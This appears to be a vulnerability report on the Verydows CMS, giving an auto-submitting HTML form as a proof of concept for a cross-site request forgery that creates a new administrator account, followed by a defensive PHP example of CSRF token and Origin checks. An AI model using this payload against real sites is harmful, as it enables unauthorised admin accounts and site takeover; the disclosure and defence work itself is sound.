A CSRF vulnerability was found in this CMS. A logged-in administrator user may add another administrator account by clicking the following POC:
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<input type=text name="username" value="TomAPU" />
<input type=text name="password" value="123456" />
<input type=text name="resetpwd" value="1" />
<input type=text name="repassword" value="123456" />
<input type=text name="name" value="TomAPU" />
<input type=text name="email" value="admin@pornhub.com" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
Fixed in 22fe3b3
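A server-side check that rejects the auto-submitting form from the report, as an added example in PHP. It is not Verydows code and not the change made in 22fe3b3; the helper names `csrf_token` and `csrf_check`, the `csrf_token` form field and the `shop.example` origin are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not Verydows code.

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random value
    }
    return $session['csrf_token'];
}

/** Decide whether a state-changing backend request may proceed. */
function csrf_check(array $session, array $post, array $server, string $ownOrigin): bool
{
    // Account creation must arrive as POST, never as a GET link.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // When the browser sends Origin, it has to be the site's own origin.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false;
    }
    // The form must echo the token stored in the administrator's session.
    $known = $session['csrf_token'] ?? '';
    $sent  = $post['csrf_token'] ?? '';
    return is_string($known) && is_string($sent) && $known !== ''
        && hash_equals($known, $sent); // constant-time comparison
}

// Constructed demo data: $session stands in for $_SESSION, $post for $_POST.
$ownOrigin = 'https://shop.example';
$session = [];
$token = csrf_token($session); // would be rendered as a hidden field in the real form

// Same fields as the form in the report, sent from another site: no token.
$crossSite = ['username' => 'TomAPU', 'password' => '123456', 'repassword' => '123456'];
$crossSiteServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'];

// The genuine backend form includes the hidden token field.
$genuine = $crossSite + ['csrf_token' => $token];
$genuineServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $ownOrigin];

echo 'cross-site request allowed: ', var_export(csrf_check($session, $crossSite, $crossSiteServer, $ownOrigin), true), PHP_EOL;
echo 'genuine request allowed:    ', var_export(csrf_check($session, $genuine, $genuineServer, $ownOrigin), true), PHP_EOL;
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` adds a second layer, since the browser then withholds the cookie from cross-site POSTs.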